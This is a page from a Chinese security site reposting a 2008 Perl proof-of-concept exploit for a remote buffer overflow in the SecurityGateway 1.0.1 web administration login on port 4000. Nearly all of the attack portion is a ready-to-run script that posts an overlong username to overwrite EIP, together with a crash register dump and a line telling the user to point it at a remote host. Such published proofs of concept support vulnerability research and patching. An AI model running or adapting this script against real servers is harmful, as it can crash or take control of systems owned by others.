首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC
来源:http://www.altn.com/ 作者:critical 发布时间:2008-06-02  
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned  when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#63636363 ??              ???
#
# Replace http://127.0.0.1:4000/ with your remote host.

use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my $payload2 ="b" x 480;
my $eip_owned = "c" x 4;

print "SecurityGateway Remote BoF exploit by securfrog.\n\n";
my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll');
$req->content_type('application/x-www-form-urlencoded');
$req->content('RequestedPage=login&username='.$payload2.$eip_owned.$payload1.'&passwd=world&lang=en&logon=Sign+In');
my $res = $connect->request($req);
print $res->as_string;
print "Exploit successfull\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component com_mycontent
·Joomla Component JooBB 0.5.9 B
·Samba (client) receive_smb_raw
·Debian OpenSSL Predictable PRN
·Joomla Component com_biblestud
·Joomla Component acctexp <= 0.
·freeSSHd 1.2.1 Remote Stack Ov
·MDaemon <= 9.6.5 Multiple Remo
·80sec发现的phpwind注册漏洞
·C6 Messenger ActiveX Remote Do
·PHP Booking Calendar 10 d (fck
·Joomla Component JooBlog 0.1.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved